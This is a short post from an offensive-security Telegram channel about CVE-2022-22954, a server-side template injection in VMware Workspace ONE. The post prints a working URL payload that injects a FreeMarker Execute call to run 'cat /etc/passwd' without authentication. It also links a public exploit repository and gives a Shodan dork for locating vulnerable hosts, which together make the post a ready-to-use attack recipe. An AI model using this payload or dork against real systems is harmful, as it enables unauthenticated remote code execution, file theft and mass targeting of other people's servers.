12.9K subscribers
550 photos
27 videos
24 files
890 links
This channel discusses:

— Offensive Security
— RedTeam
— Malware Research
— OSINT
— etc

Disclaimer:
t.me/APT_Notes/6

Chat Link:
t.me/APT_Notes_PublicChat
Download Telegram
VMware Workspace ONE — SSTI (CVE-2022-22954)

Successful exploitation could lead to RCE from an unauthenticated user.

Payload:
https://victim/catalog-portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("cat /etc/passwd")}

Exploit:
https://github.com/bewhale/CVE-2022-22954

Shodan Dork:
http.favicon.hash:-1250474341

#vmware #workspace #ssti #cve